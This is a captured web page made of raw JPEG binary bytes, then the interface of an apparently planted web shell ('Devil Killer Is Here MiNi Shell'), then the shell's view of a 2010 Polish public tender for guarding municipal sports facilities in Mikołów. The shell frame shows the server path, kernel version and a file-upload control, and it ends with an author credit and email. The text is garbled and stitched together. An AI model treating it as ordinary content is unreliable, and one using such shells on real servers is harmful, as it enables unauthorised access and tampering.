JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20101130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20101130/388696-N-2010.html

<p class="kh_header"><b>Mikołów: Ochrona mienia na terenie obiektów administrowanych przez Miejski Ośrodek Sportu i Rekreacji w Mikołowie</b><br>
<b>Numer ogłoszenia: 388696 - 2010; data zamieszczenia: 30.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Konstytucji 3 Maja 22, 43-190 Mikołów, woj. śląskie, tel. 32 3242603, faks 32 3242688.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.mikolow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona mienia na terenie obiektów administrowanych przez Miejski Ośrodek Sportu i Rekreacji w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Ochrona mienia na terenie obiektów administrowanych przez Miejski Ośrodek Sportu i Rekreacji w Mikołowie:
1.Kryta Pływalnia Aqua Plant w Mikołowie przy ul. Konstytucji 3 Maja 22 w okresie od  stycznia 2011 roku do 31 grudnia 2011 roku wraz z Domkiem Parkowym w Mikołowie przy ul. Plac Harcerski (planowane rozpoczęcie usługi w II kwartale 2011 roku).
Przedmiot zamówienia realizowany będzie:
w każdy dzień tygodnia, soboty, niedziele i święta w godz. od 1800 do 2200 (kryta pływalnia Aqua Plant) oraz od godz. 2200 do godz. 600 (Domek Parkowy) przez      1 pracownika ochrony.

Obowiązki Wykonawcy:
a)	czynne przeciwdziałanie kradzieżom i napadom rabunkowym na terenie obiektu, 
b)	stałe patrolowanie terenu wewnątrz i na zewnątrz obiektu oraz miejsc o szczególnym zagrożeniu,
c)	w godzinach nocnych tj. od 2200 do 600 wzmożone czynności ochrony oraz wpuszczanie do chronionego obiektu jego pracowników, ewentualne inne służby techniczne, które mają prawo wstępu tylko na podstawie pisemnego zezwolenia wydanego przez Zamawiającego,
d)	nie wpuszczanie do obiektu osób znajdujących się pod wpływem alkoholu lub środków odurzających (narkotyki, itp.)
e)	sprawdzanie stanu zabezpieczenia technicznych typu: kłódki, zamki, kraty, drzwi, okna, oświetlenie, ogrodzenie itp.
f)	utrzymywanie stałej łączności z koordynatorem zmiany, bazą i grupą interwencyjną,
g)	podejmowanie interwencji wobec osób zakłócających porządek wewnątrz obiektu, 
h)	wsparcie pracowników ochrony stacjonarnej przez grupę interwencyjną  w przypadku zdarzeń zagrażających chronionemu mieniu i osobom (dojazd grupy interwencyjnej na obiekt do 10 min),
i)	zapobieganie przestępstwom i wykroczeniu przeciwko mieniu objętemu przedmiotem zamówienia,
j)	zapewnienie jednolitego umundurowania osób wykonujących przedmiot zamówienia zgodnie z przepisami art. 38 pkt. 2 ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z 2005 roku Nr 145, poz. 1221 z późn. zm.),
k)	wyposażenie pracowników w sprzęt i łączność,
l)	włączanie i wyłączanie systemów alarmowych,
m)	zapoznanie pracowników z regulaminami obowiązującymi na obiektach,
n)	prowadzenie książki dyżurów poprzez wpisywanie informacji o objęciu i zdaniu dyżuru oraz wszelkich zdarzeniach zaistniałych w trakcie pełnienia służby,
o)	niezwłoczne informowanie upoważnionych pracowników Zleceniodawcy o wszelkich zaistniałych zdarzeniach na terenie chronionych obiektów,
p)zachowanie tajemnicy i nie przekazywanie osobom trzecim informacji  o Zamawiającym i prowadzonych przez niego sprawach,
q)wykonywanie innych czynności wskazanych przez Zamawiającego mających związek z zapewnieniem prawidłowej pracy urządzeń w obiekcie.
2.Stadion Miejski wraz z kompleksem boisk sportowych Orlik 2012 w Mikołowie przy     ul. Zawilców 8 w okresie od stycznia 2011 roku do 31 grudnia 2011 roku.   
Przedmiot zamówienia realizowany będzie:
w każdy dzień tygodnia, soboty, niedziele i święta w godz. od 2200 do 600 przez      1 pracownika ochrony.
Obowiązki Wykonawcy:
a)	czynne przeciwdziałanie kradzieżom i napadom rabunkowym na terenie obiektu, 
b)	stałe patrolowanie terenu wewnątrz i na zewnątrz obiektu oraz miejsc o szczególnym zagrożeniu,
c)	sprawdzanie stanu zabezpieczenia technicznych typu: kłódki, zamki, kraty, drzwi, okna, oświetlenie, ogrodzenie itp.
d)	podejmowanie interwencji wobec osób zakłócających porządek na terenie obiektu, 
e)	sprawdzanie czy osoby wchodzące i przebywające na terenie obiektu po godzinach pracy są do tego upoważnione,
f)	nie wpuszczanie na teren obiektu osób znajdujących się pod wpływem alkoholu lub środków odurzających (narkotyki, itp.)
g)	wsparcie pracowników ochrony stacjonarnej przez grupę interwencyjną  w przypadku zdarzeń zagrażających chronionemu mieniu i osobom (dojazd grupy interwencyjnej na obiekt nie powinien przekroczyć 10 min),
h)	zapobieganie przestępstwom i wykroczeniu przeciwko mieniu objętemu przedmiotem zamówienia,
i)	zapewnienie jednolitego umundurowania osób wykonujących przedmiot zamówienia zgodnie z przepisami art. 38 pkt. 2 ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z 2005 roku Nr 145, poz. 1221 z późn. zm.),
j)	utrzymywanie stałej łączności z koordynatorem zmiany, bazą i grupą interwencyjną,
k)	wyposażenie pracowników w sprzęt i łączność,
l)	włączanie i wyłączanie systemów alarmowych,
m)	zapoznanie pracowników z regulaminami obowiązującymi na obiekcie,
n)	prowadzenie książki dyżurów poprzez wpisywanie informacji o objęciu i zdaniu dyżuru oraz wszelkich zdarzeniach zaistniałych w trakcie pełnienia służby,
o)	niezwłoczne informowanie upoważnionych pracowników Zleceniodawcy o wszelkich zaistniałych zdarzeniach na terenie chronionych obiektów,
p)	zachowanie tajemnicy i nie przekazywanie osobom trzecim informacji                                  o Zamawiającym i prowadzonych przez niego sprawach,
q)	wykonywanie innych czynności wskazanych przez Zamawiającego mających związek                  z zapewnieniem prawidłowej pracy urządzeń w obiekcie.
3.	Hala Sportowa MOSiR Mikołów przy ul. Bandurskiego 1A, 43-190 Mikołów od stycznia 2011 roku do 31 grudnia 2011 roku
Przedmiot zamówienia realizowany będzie:
a)	codziennie od poniedziałku do piątku w soboty niedziele oraz święta od godz. 2200 do 600 przez 1 pracownika ochrony.
Obowiązki Wykonawcy:
a)	czynne przeciwdziałanie kradzieżom i napadom rabunkowym na terenie obiektu, 
b)	stałe patrolowanie terenu wewnątrz i na zewnątrz obiektu oraz miejsc o szczególnym zagrożeniu z uwzględnieniem obiektu znajdującego się na chronionym terenie,                               a znajdującym się przy ul. Konstytucji 3 Maja,
c)	sprawdzanie czy osoby wchodzące i przebywające w chronionym obiekcie po godzinach pracy są do tego upoważnione,
d)	obsługa systemu monitoringu,
e)	obsługa portierni wraz z ewidencją wydawanych i przyjmowanych kluczy do pomieszczeń
f)	nie wpuszczanie do obiektu osób znajdujących się pod wpływem alkoholu lub środków odurzających (narkotyki, itp.),
g)	sprawdzanie stanu zabezpieczenia technicznych typu: kłódki, zamki, kraty, drzwi, okna, oświetlenie, ogrodzenie, alarm itp.
h)	podejmowanie interwencji wobec osób zakłócających porządek wewnątrz obiektu, 
i)	wsparcie pracowników ochrony stacjonarnej przez grupę interwencyjną  w przypadku zdarzeń zagrażających chronionemu mieniu i osobom (dojazd grupy interwencyjnej na obiekt do10 min),
j)	zapobieganie przestępstwom i wykroczeniu przeciwko mieniu objętemu przedmiotem zamówienia,
k)	zapewnienie jednolitego umundurowania osób wykonujących przedmiot zamówienia zgodnie z przepisami art. 20 oraz 21 ustawy z dnia 22 sierpnia 1997 roku o ochronie osób              i mienia (Dz. U. z 2005 roku Nr 145, poz. 1221 z późn. zm.),
l)	utrzymywanie stałej łączności z koordynatorem zmiany, bazą i grupą interwencyjną,
m)	wyposażenie pracowników w sprzęt i łączność,
n)	włączanie i wyłączanie systemów alarmowych,
o)	zapoznanie pracowników z regulaminami obowiązującymi na obiekcie,
p)	prowadzenie książki dyżurów poprzez wpisywanie informacji o objęciu i zdaniu dyżuru oraz wszelkich zdarzeniach zaistniałych w trakcie pełnienia służby,
q)	niezwłoczne informowanie upoważnionych pracowników Zleceniodawcy o wszelkich zaistniałych zdarzeniach na terenie chronionych obiektów,
r)	zachowanie tajemnicy i nie przekazywanie osobom trzecim informacji o Zamawiającym                i prowadzonych przez niego sprawach,
s)	wykonywanie innych czynności wskazanych przez Zamawiającego mających związek                  z zapewnieniem prawidłowej pracy urządzeń w obiekcie.
4.	Kąpielisko Miejskie w Mikołowie przy ul. Konstytucji 3 Maja 38 w Mikołowie od czerwca 2011 roku do 31 sierpnia 2011 roku
 Przedmiot zamówienia realizowany będzie:
1.	w każdy dzień tygodnia, soboty, niedziele i święta w godz. od 2200 do 600 przez                   1 pracownika ochrony
Obowiązki Wykonawcy:
a)	czynne przeciwdziałanie kradzieżom i napadom rabunkowym na terenie obiektu, 
b)	stałe patrolowanie terenu wewnątrz i na zewnątrz obiektu oraz miejsc o szczególnym zagrożeniu,
c)	podejmowanie interwencji wobec osób zakłócających porządek wewnątrz obiektu, 
d)	sprawdzanie czy osoby wchodzące i przebywające w chronionym obiekcie po godzinach pracy są do tego upoważnione,
e)	sprawdzanie stanu zabezpieczenia technicznych typu: kłódki, zamki, kraty, drzwi, okna, oświetlenie, ogrodzenie itp.
f)	nie wpuszczanie na teren obiektu osób znajdujących się pod wpływem alkoholu lub środków odurzających (narkotyki, itp.),
g)	wsparcie pracowników ochrony stacjonarnej przez grupę interwencyjną  w przypadku zdarzeń zagrażających chronionemu mieniu i osobom (dojazd grupy interwencyjnej na obiekt do10 min),
h)	zapobieganie przestępstwom i wykroczeniu przeciwko mieniu objętemu przedmiotem zamówienia,
i)	jednolite umundurowanie oraz uzbrojenie osób wykonujących przedmiot zamówienia zgodnie z przepisami art. 38 pkt. 2 ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z 2005 roku Nr 145, poz. 1221 z późn.zm),
j)	utrzymywanie stałej łączności z koordynatorem zmiany, bazą i grupą interwencyjną,
k)	wyposażenie pracowników w sprzęt i łączność,
l)	zapoznanie pracowników z regulaminami obowiązującymi na obiekcie,
m)	prowadzenie książki dyżurów poprzez wpisywanie informacji o objęciu i zdaniu dyżuru oraz wszelkich zdarzeniach zaistniałych w trakcie pełnienia służby,
n)	niezwłoczne informowanie upoważnionych pracowników Zleceniodawcy o wszelkich zaistniałych zdarzeniach na terenie chronionych obiektów,
o)	zachowanie tajemnicy i nie przekazywanie osobom trzecim informacji                                 o Zamawiającym i prowadzonych przez niego sprawach,
p)	wykonywanie innych czynności wskazanych przez Zamawiającego mających związek                  z zapewnieniem prawidłowej pracy urządzeń w obiekcie.
2.	Zamawiający przewiduje możliwość zwiększenia liczby pracowników ochrony w uzasadnionych przypadkach o czym poinformuje Wykonawcę oddzielnym pismem.
3.	Wykonawca zobowiązuje się do wyposażenia pracowników, wykonujących usługę będącą przedmiotem niniejszego postępowania  w  jednolite umundurowanie z logo Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.40.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania aktualnej koncesji Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie wykonywanych usług ochrony osób i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert,            a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie min. dwóch usług odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia o wartości min. 70 000,00   netto każda</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują minimum 5 pracownikami ochrony posiadającymi co najmniej roczny staż pracy na danym stanowisku
dysponują grupą interwencyjną z czasem reakcji do 10 minut, czas reakcji jest to czas dotarcia grupy na obiekt.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>są ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 60 000,00</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenia zmian postanowień umowy w zakresie ceny brutto o ile zmianie ulegną obowiązujące stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.mikolow.eu, www.bip.mikolow.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Mikołowie, ul. Kolejowa 2
Sekretariat I piętro pokój 110..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2010 godzina 13:00, miejsce: Miejski Ośrodek Sportu i Rekreacji w Mikołowie, ul. Kolejowa 2
Sekretariat I piętro pokój 110..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com